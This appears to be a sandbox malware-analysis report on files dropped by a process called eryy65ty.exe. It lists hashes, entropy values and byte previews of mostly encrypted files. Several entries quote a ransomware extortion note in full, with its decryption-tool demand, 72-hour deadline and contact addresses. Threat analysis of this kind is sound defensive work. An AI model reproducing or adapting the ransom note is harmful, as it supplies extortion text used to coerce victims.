                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.83415183495862
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:MOdG3qqTUZTkPut5VObUIwyDvDv/+dRn3f5Nd2KBjU0ONx8Ow:/ksTkPut5VKUu7adZ5NTUfNx8p
                                                                                                                                            MD5:855D247320399E061BE78B9B7DC04FF2
                                                                                                                                            SHA1:8105456C31E73691725405CAEA491C47572B2B34
                                                                                                                                            SHA-256:F599E1FF91D84C7068275075D29362920E3D3816C9EBE726026A2ADCFF2F7242
                                                                                                                                            SHA-512:CFCF1DB62D059F0207CC64E94CEEC95B31FD178626F10BADDD6F0E08623A8E1648B81C19E7FF7DA49FA85433FA155213D471CAF009039B305981718D94993C4E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.$....TZ..I.O..7......d..2..'./.....t~..C..6...A..`..(....9..G...Tsy...:g.UjgH...q.X....j..b.m.&!J .'. $."=.^..F...D0..Va....D...S......use..l.0........b...{b.x..Z.%QN9.gx...M..z.f.....W.f....5.KCnm...nP.y..u..`...S._.\^...5a.L`......y.%...zJ.N.1..)wh7...D...S.fy.......EYK..A2.......%.i...y........w.j.._<.0.Rm3.67."M.Q........hF.1P1 ....Q.<..8.h9...b..ip=5'..]..._.f...g..{?........(.:;N.c.y.`n.[l..TE. 8..xMA-]..XS..........2...DsHwI.d..m...!...C8.?...il7..VY..U.. 1.oP4......(j....H.K....^../1R..Z............#?.4EEV..Z....Nblb.H......ui.....8.q..@...J7...d.u....xh..h3.(..<?..SH....Q....*...M...H..b...L.........S;.!...j..=....*d.c.>|..<..6.s.....Q.T...S.Q6{..Z...P8ISQ.....|<md..;..Kq.qy....=.;..?..a?#..0..h...].*..B..Y..We4..$h.SO...cuC.{n%.k.@5k...>.."...j..6./Ni(Zs...b.t5H......)h.gbv.&.<.;...%<.....5./j.5...b...jR.X.'q1(......... .1#,.....:.T...C..#.N>.S."..Y.X&..k*d.....Brt.g.2..y..rEL..t...?...!z..,2q. .=.mq.....X.T.z.;].<%
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.844506388003083
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:rLWCmAU6qEnfVkzt0dIh8CiD08VXs4LB1BslZSAO1oKGxFKcfblFF:rSvAjfV6KddIoxjiXKGDKcfF
                                                                                                                                            MD5:8DBD82965C6A6818809455E3F740EA8A
                                                                                                                                            SHA1:4247D8A71D9A09878185CF0E888EF420A71D3F98
                                                                                                                                            SHA-256:184116E3DA758A9D8ED36590399F75C27E2B42369A2BFBC9045BAA9F4AA18D7C
                                                                                                                                            SHA-512:350D54BD3B678E55D7E90DF0CEFC1B040D85E0F2BB10343EE859526468ADC04AFC58B6D36CE31E724C2C2610C355DB7F8F7F553796747182F15C05D4E25444BA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:6.e.f+..8..'....?..b9gl..Y.`b.e..g.Z......:b..j.9E...|..+~.......D.....i..6...............*2....4H:.T...m...Q.~......O#j.7.....-'....m...<.f........[x.0.....z.B`.r.v...7..ed.t..2@.M...^..hM..I.4...|...s4#.4...x......|...U.b.,m...D.......\*Mc*......_.~..?....I............7.rxi....Sgs...V.e..?...h...cz.E9.......Kt).....(9....U...cu!0.G...&...y.K...K.?8.b.=pb!..CO..WP...?"..?.:^._[B.....e.<nc.b...:S."...G..k.....0`.k4..a.h.\f..6.F.n.1.\.........6].n.,....a.!JI.....I...(p..>P..f..x....h.y..T..^}..a?.+O%..AXcR...Hk.$.......1..'./;+..w?.......f...Z.,.j......ZnG.)y28...]:.+..$..xW........Wy...7. "!...#1ho..O...j5...^.|..A@.N.A@QIB.?..,I..i3.{oT.;.Sm.m.Pw.Qq......5...Q6....ro...Pq..).{N|..)...aO.YF.0.% ..S-.B2....^.o..T........]...._..S....q.<..J=......i..I...._.G(.Re...&uF|...4...we .l..8... dF.. ..T.h.......N.<l."..m..R>VZ....!..i.@.p..9...7>.....N.....`....23.8~1..k..r.7gh...v..[.i.E.i.L....V.E...^H.T.[T..l...#..!Y3...`.Gg......B.I.T..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.844506388003083
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:rLWCmAU6qEnfVkzt0dIh8CiD08VXs4LB1BslZSAO1oKGxFKcfblFF:rSvAjfV6KddIoxjiXKGDKcfF
                                                                                                                                            MD5:8DBD82965C6A6818809455E3F740EA8A
                                                                                                                                            SHA1:4247D8A71D9A09878185CF0E888EF420A71D3F98
                                                                                                                                            SHA-256:184116E3DA758A9D8ED36590399F75C27E2B42369A2BFBC9045BAA9F4AA18D7C
                                                                                                                                            SHA-512:350D54BD3B678E55D7E90DF0CEFC1B040D85E0F2BB10343EE859526468ADC04AFC58B6D36CE31E724C2C2610C355DB7F8F7F553796747182F15C05D4E25444BA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:6.e.f+..8..'....?..b9gl..Y.`b.e..g.Z......:b..j.9E...|..+~.......D.....i..6...............*2....4H:.T...m...Q.~......O#j.7.....-'....m...<.f........[x.0.....z.B`.r.v...7..ed.t..2@.M...^..hM..I.4...|...s4#.4...x......|...U.b.,m...D.......\*Mc*......_.~..?....I............7.rxi....Sgs...V.e..?...h...cz.E9.......Kt).....(9....U...cu!0.G...&...y.K...K.?8.b.=pb!..CO..WP...?"..?.:^._[B.....e.<nc.b...:S."...G..k.....0`.k4..a.h.\f..6.F.n.1.\.........6].n.,....a.!JI.....I...(p..>P..f..x....h.y..T..^}..a?.+O%..AXcR...Hk.$.......1..'./;+..w?.......f...Z.,.j......ZnG.)y28...]:.+..$..xW........Wy...7. "!...#1ho..O...j5...^.|..A@.N.A@QIB.?..,I..i3.{oT.;.Sm.m.Pw.Qq......5...Q6....ro...Pq..).{N|..)...aO.YF.0.% ..S-.B2....^.o..T........]...._..S....q.<..J=......i..I...._.G(.Re...&uF|...4...we .l..8... dF.. ..T.h.......N.<l."..m..R>VZ....!..i.@.p..9...7>.....N.....`....23.8~1..k..r.7gh...v..[.i.E.i.L....V.E...^H.T.[T..l...#..!Y3...`.Gg......B.I.T..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:OpenPGP Secret Key
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.855375328881884
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:ugGJBr04aKtNzEcmM1eWoE394fS9mz6hpv2x8goLnDJc4B0KzG7Oq7OdZJdH:s0DKHEcmXbEND4LoLdzmOqSZDH
                                                                                                                                            MD5:64A2DC96C334D316B78D7EAA4EA2CEA2
                                                                                                                                            SHA1:48838E0A46622286120153AA24F0D39704D15F1B
                                                                                                                                            SHA-256:0988626302F1B950A236347221AED959B86408792560D58497EB78E254AF02D6
                                                                                                                                            SHA-512:E2B6FD572376BEBC7809407FAF0B4EA7082C62FC59F57C4FC7DF90B2D86D6919F646AA79D0FAC990B120454F5175B2A145EF2A279CC9A46828842BEB2C82349E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..A.......h..,.gD.T..Yf.z.+4..!P..,oO.z..@Q..K.N.2....6..<.\ ..2.Z.f9. ..8.LTkxJ'/........!.q.....h$/O.3..&..}.t.|..9..E..L.J.c..|....#..C@..,BQE..$.....U........@..]....x...bt...`.f_:_.X.3\.W3....!..A..u.S>G)....d.T.....G.....<)....V]....t.....t......H.g....`...*R........Y....K...... .9I.@....Wj...^...ri...:....s...;..Y P.\>/&.t...3.Q{..}8.<...mA..i,.a.._..9.H..0..IQ.X3w.s5....o..A......l...?.D...........w..X.d..9.uX<q>..|.)...:rs....c.. ._Vl.CiA..Rm&...'.oyV.<E(.al.{......;..z6<S.:.$ rX#...D...v_f.....b].Z...WfW...U....'.[.v..S.yT..>qJ..D........t2.y...i.B.`.Z..._.L..)G.].O.RB.....6...*W5..GB..a..].aY.^,-...4...".51#?....... .Q..<.U@....f!..j..xX..M.Ft;..,.;.e....3_.e...xD..?.O[.\z...,p......?.....9."...q:`.([#.x.6.".p8......?:q.j....f.B.0[..Ci.\..Oh.a.H..A.....%......2.no..f....H..M.Jf..IH.%..+."&..A.fm...$..LdG.'."O.....EC..._`.KU>..e..J(/.T7r.....K....f..,...\\Q."{.`....f.m3.V.+..>D\.!..^..?....R.JA.J..44..1..!.7g.[...).6.9...G..oc.+......^..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:OpenPGP Secret Key
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.855375328881884
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:ugGJBr04aKtNzEcmM1eWoE394fS9mz6hpv2x8goLnDJc4B0KzG7Oq7OdZJdH:s0DKHEcmXbEND4LoLdzmOqSZDH
                                                                                                                                            MD5:64A2DC96C334D316B78D7EAA4EA2CEA2
                                                                                                                                            SHA1:48838E0A46622286120153AA24F0D39704D15F1B
                                                                                                                                            SHA-256:0988626302F1B950A236347221AED959B86408792560D58497EB78E254AF02D6
                                                                                                                                            SHA-512:E2B6FD572376BEBC7809407FAF0B4EA7082C62FC59F57C4FC7DF90B2D86D6919F646AA79D0FAC990B120454F5175B2A145EF2A279CC9A46828842BEB2C82349E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..A.......h..,.gD.T..Yf.z.+4..!P..,oO.z..@Q..K.N.2....6..<.\ ..2.Z.f9. ..8.LTkxJ'/........!.q.....h$/O.3..&..}.t.|..9..E..L.J.c..|....#..C@..,BQE..$.....U........@..]....x...bt...`.f_:_.X.3\.W3....!..A..u.S>G)....d.T.....G.....<)....V]....t.....t......H.g....`...*R........Y....K...... .9I.@....Wj...^...ri...:....s...;..Y P.\>/&.t...3.Q{..}8.<...mA..i,.a.._..9.H..0..IQ.X3w.s5....o..A......l...?.D...........w..X.d..9.uX<q>..|.)...:rs....c.. ._Vl.CiA..Rm&...'.oyV.<E(.al.{......;..z6<S.:.$ rX#...D...v_f.....b].Z...WfW...U....'.[.v..S.yT..>qJ..D........t2.y...i.B.`.Z..._.L..)G.].O.RB.....6...*W5..GB..a..].aY.^,-...4...".51#?....... .Q..<.U@....f!..j..xX..M.Ft;..,.;.e....3_.e...xD..?.O[.\z...,p......?.....9."...q:`.([#.x.6.".p8......?:q.j....f.B.0[..Ci.\..Oh.a.H..A.....%......2.no..f....H..M.Jf..IH.%..+."&..A.fm...$..LdG.'."O.....EC..._`.KU>..e..J(/.T7r.....K....f..,...\\Q."{.`....f.m3.V.+..>D\.!..^..?....R.JA.J..44..1..!.7g.[...).6.9...G..oc.+......^..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1275
                                                                                                                                            Entropy (8bit):7.851261390749306
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:M458ytM4TCyWuJaizMzWHmrngvq62t1HEcBKbkTBD+93ysP2j40:ZTdvJaizJi62t1k3Id+93/ejj
                                                                                                                                            MD5:A4AD2120C0FFB8C1AFFCBD5E8D4F904B
                                                                                                                                            SHA1:B2E5EFC7F7058979FD2BDF0EE175AFFABAE7BA63
                                                                                                                                            SHA-256:A2BF7DA54194ABADDD5B7F6F7BB288AED5FA5553E266CB0EF14F5E9CCC7CD14E
                                                                                                                                            SHA-512:8609D675D8B43A5139E07FB16D9A6E4AF70B303A8FD4E0C55821E54B7395BE2051FFCE30874F33367B0B1292B825F8E1C340199039BF04475C6F50D84992289D
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:. p..o.2............Z...4........![#...W....E..*..23..5....2.^..D}.;w.z.k,5.r.W......L.ck.tWbv....sO...`y...Mf...R`X.y....;B..s[....o..1...'...U........5?.....3........8.Z..u..h....G....:.. ..o..=SO...:B4.....A.bz#.G.ZDw.:..a.9..|.sq#.j..0.~.'N.Mw...h%.H..~.a....$.x3.f[...(...)./dh@..U...T........1Si.....9..X_...}&".#......4.T..n"C..*B?..7...)..,Y%.....^B^#)7..[...5`.y..t|,. .o.FU.O.yp......5!...|.3.;.:..:.W..y.W.BZ.?.M..K."..o.l!...|..E..\..6R....G.....*.[`ZC|.v...e.LOz.V.k........!.../.M......?V8..V...D1C....N/.Ly..z.....p...c...P......1..y...x.Q!(x?n.@b......VF..By...&04....'..i.../...y.C.u.Z.9,.o..Q...4......U,'..T14..t&.../4.....U|..BV....b...^...@..+'.X6.....Q4...+....N..q\*..E.U.n.....c`..W.H.....p..}..... ^....R..se....'......Sz.F.......`m...6.8&4.5....4H........$........d..q.,o..A.^..EQo.$..+.LH~X7.~..y..2:.G"..Q0.........(..)W.yig...*.+...V.....2S.+.uxBv...>Y..u..WE..B.......{V....lv..P..M......Y...X6...... .{
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1275
                                                                                                                                            Entropy (8bit):7.851261390749306
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:M458ytM4TCyWuJaizMzWHmrngvq62t1HEcBKbkTBD+93ysP2j40:ZTdvJaizJi62t1k3Id+93/ejj
                                                                                                                                            MD5:A4AD2120C0FFB8C1AFFCBD5E8D4F904B
                                                                                                                                            SHA1:B2E5EFC7F7058979FD2BDF0EE175AFFABAE7BA63
                                                                                                                                            SHA-256:A2BF7DA54194ABADDD5B7F6F7BB288AED5FA5553E266CB0EF14F5E9CCC7CD14E
                                                                                                                                            SHA-512:8609D675D8B43A5139E07FB16D9A6E4AF70B303A8FD4E0C55821E54B7395BE2051FFCE30874F33367B0B1292B825F8E1C340199039BF04475C6F50D84992289D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:. p..o.2............Z...4........![#...W....E..*..23..5....2.^..D}.;w.z.k,5.r.W......L.ck.tWbv....sO...`y...Mf...R`X.y....;B..s[....o..1...'...U........5?.....3........8.Z..u..h....G....:.. ..o..=SO...:B4.....A.bz#.G.ZDw.:..a.9..|.sq#.j..0.~.'N.Mw...h%.H..~.a....$.x3.f[...(...)./dh@..U...T........1Si.....9..X_...}&".#......4.T..n"C..*B?..7...)..,Y%.....^B^#)7..[...5`.y..t|,. .o.FU.O.yp......5!...|.3.;.:..:.W..y.W.BZ.?.M..K."..o.l!...|..E..\..6R....G.....*.[`ZC|.v...e.LOz.V.k........!.../.M......?V8..V...D1C....N/.Ly..z.....p...c...P......1..y...x.Q!(x?n.@b......VF..By...&04....'..i.../...y.C.u.Z.9,.o..Q...4......U,'..T14..t&.../4.....U|..BV....b...^...@..+'.X6.....Q4...+....N..q\*..E.U.n.....c`..W.H.....p..}..... ^....R..se....'......Sz.F.......`m...6.8&4.5....4H........$........d..q.,o..A.^..EQo.$..+.LH~X7.~..y..2:.G"..Q0.........(..)W.yig...*.+...V.....2S.+.uxBv...>Y..u..WE..B.......{V....lv..P..M......Y...X6...... .{
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.848073725900345
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:ofNSA0kc8j9T/iQt5k4y2//5DcVAyDNGXCewvr+/QxUlgyJ+xliK5NILvl9zDgAZ:ofNcknBt5k4zHZh8be0hxoKbILN9zZg6
                                                                                                                                            MD5:7930B719A8E398864534861E06B1A7DD
                                                                                                                                            SHA1:08721AA6EF175C60722E0363E1B1CF328AE59B4D
                                                                                                                                            SHA-256:82C72F3CE137E74068B3C1FDCF977377F4DD5BB54D7A31A72042A52532973503
                                                                                                                                            SHA-512:3D3ADAC12AE7D0EC1125417BB8FBBB4C056EA0E8F12E565A0BCC07714E8C5926E915A6C9FEFC8176E524EA36C608F072DBD8ABB4183B288590821FDF90A142A0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..I..z,-..#[I{....G.b). ..Z.)..7......o...,.x@......h.9...p......8.w..?..Z.m..f./.m.....w..R..P.%V....G..F..?..U.<.^<....K..<.]2v*h^..p.ag.Lu...:mmB...v.......].D.o..qq^93.1^._.,.Q....}..q.L.:M.&...s"/.4O...%z...-.<.F6......PS....'.J.^.dAZ..l..e..2W7+....L.s....B...Ib.LC..-Gi.M....0..e\.2...,...!.@..: ..Z.m^ .A..(.2..E.3*/...../..t.Z.x;.iH.M.r..:.0....pJ..j.l.r...A?.joM....l$..Y.P_.e.....I.Dsjr...Z.,m,;..3.M.:TG..NO.6.:..^.*..r...J.....k..R...0&.D...).d$..@.c..z.g:.{Q2r.:.0....9..,..I.^...d.u.`i........\.'..c...4.u~W....T".9..^.l..1M$.!uFK...,2S..?].N+J.~!%...hcN..."|-....r.YQ.Nk.g..2..V..AqM@..+E?NX...@..!.ro\.#....F.h.;t..%C.M.y.....X...c....?...Q3..$..v.P....'..\..*}j;3.gL.1K.bc.G.I...L....\V.86..J.dK.z..Z>"..`L5_...s..6;....[k...:.."A.7ij.e.A=.\...ChvD..pI....[_.&.........*.7.....Z:k.G...)k.A.U.......zcl......F.V.T...... .|.e....|\HK.Q"B...;..c.)G.........#.ug...{.U...W.r.@.. b.xYr.>......r/..V.F....r..[......Z1.#..*.m.+bRgv..u..p.]...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.848073725900345
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:ofNSA0kc8j9T/iQt5k4y2//5DcVAyDNGXCewvr+/QxUlgyJ+xliK5NILvl9zDgAZ:ofNcknBt5k4zHZh8be0hxoKbILN9zZg6
                                                                                                                                            MD5:7930B719A8E398864534861E06B1A7DD
                                                                                                                                            SHA1:08721AA6EF175C60722E0363E1B1CF328AE59B4D
                                                                                                                                            SHA-256:82C72F3CE137E74068B3C1FDCF977377F4DD5BB54D7A31A72042A52532973503
                                                                                                                                            SHA-512:3D3ADAC12AE7D0EC1125417BB8FBBB4C056EA0E8F12E565A0BCC07714E8C5926E915A6C9FEFC8176E524EA36C608F072DBD8ABB4183B288590821FDF90A142A0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..I..z,-..#[I{....G.b). ..Z.)..7......o...,.x@......h.9...p......8.w..?..Z.m..f./.m.....w..R..P.%V....G..F..?..U.<.^<....K..<.]2v*h^..p.ag.Lu...:mmB...v.......].D.o..qq^93.1^._.,.Q....}..q.L.:M.&...s"/.4O...%z...-.<.F6......PS....'.J.^.dAZ..l..e..2W7+....L.s....B...Ib.LC..-Gi.M....0..e\.2...,...!.@..: ..Z.m^ .A..(.2..E.3*/...../..t.Z.x;.iH.M.r..:.0....pJ..j.l.r...A?.joM....l$..Y.P_.e.....I.Dsjr...Z.,m,;..3.M.:TG..NO.6.:..^.*..r...J.....k..R...0&.D...).d$..@.c..z.g:.{Q2r.:.0....9..,..I.^...d.u.`i........\.'..c...4.u~W....T".9..^.l..1M$.!uFK...,2S..?].N+J.~!%...hcN..."|-....r.YQ.Nk.g..2..V..AqM@..+E?NX...@..!.ro\.#....F.h.;t..%C.M.y.....X...c....?...Q3..$..v.P....'..\..*}j;3.gL.1K.bc.G.I...L....\V.86..J.dK.z..Z>"..`L5_...s..6;....[k...:.."A.7ij.e.A=.\...ChvD..pI....[_.&.........*.7.....Z:k.G...)k.A.U.......zcl......F.V.T...... .|.e....|\HK.Q"B...;..c.)G.........#.ug...{.U...W.r.@.. b.xYr.>......r/..V.F....r..[......Z1.#..*.m.+bRgv..u..p.]...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.861393496061274
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:OohsWN16NXQTTY9FK627LWqti6+EMqUbT7SA+2Xxbl9/WUAABy1rvRv:OohxUeldti6xVUf7QexRUAByxRv
                                                                                                                                            MD5:A57C07771038E49EB86810EEE9121C27
                                                                                                                                            SHA1:E40D77C42A436E453597AB2EAFED8FC8EE449BAF
                                                                                                                                            SHA-256:D2AD68A2E77C662E7EF311E04A03A41A595E20E2E9A94599D480F2C600EC35D8
                                                                                                                                            SHA-512:147B96C3D565871A77ED2FC8F5BAC2398FE9183B7AA7F6CF0223317D5238B4B3A6441A27575487B29A4347BB3BF87A146B921E6F79F87234C26345405FD5D60E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.r........?..Z6....f^.6..lJ7pU....9..@.......v..CY.0I......wkus>.:%...@,...?.....OCZ.C$..nJ.;....@...<q$~mL..<o)..Ze..=_...+._.Q.,...W8.../9,L.......bI..V.......D....e..e.$d.....++1...f.&.)..}.A96.].%q..I'%.5.L.y1J.A.N..L.S].N#....*.(....<_.#....2.....3.{..x....EX...!..&3..W..H.4..wR..g&.8.}..|)..Z?..^W.b...../.....8....E.K\..Y.i.J..+.......+c..3....G.T.1....OW..6..fH.f...6J.....).4...3.Z..M....z.#t.F..EK.P.A..Y.1.k$..c[...z.y..}..D..Y.........b...`|.=.]........2.(.L"4.......=.u4..n1.u....d....M...DQ..H%(a.G.......I.....`.........h...x.%U....}..+..%.....=f.......vAC(..|.h..P...R.0..|..y....!j.....;...bJr......u..c..p.[....].......r]-|.........:{.9..i.5..".6....}'...E..o5.EJn..^.......D.......t.uG!-=n......y.....G.q=.....V.?......O.;....'}..`Plq....9..?N.#......g.........{.W..hJ..h.o......W.Q..O..9.ES.W...)...P.n'H.H...@.Gd1w.5.q..L.E...0g.v.....i....E[Q.yW.s...).....F.+U2N...j.......[.0m.)...j.g...1.."..6Z#.......<esd...Z
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.861393496061274
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:OohsWN16NXQTTY9FK627LWqti6+EMqUbT7SA+2Xxbl9/WUAABy1rvRv:OohxUeldti6xVUf7QexRUAByxRv
                                                                                                                                            MD5:A57C07771038E49EB86810EEE9121C27
                                                                                                                                            SHA1:E40D77C42A436E453597AB2EAFED8FC8EE449BAF
                                                                                                                                            SHA-256:D2AD68A2E77C662E7EF311E04A03A41A595E20E2E9A94599D480F2C600EC35D8
                                                                                                                                            SHA-512:147B96C3D565871A77ED2FC8F5BAC2398FE9183B7AA7F6CF0223317D5238B4B3A6441A27575487B29A4347BB3BF87A146B921E6F79F87234C26345405FD5D60E
                                                                                                                                            Malicious:false
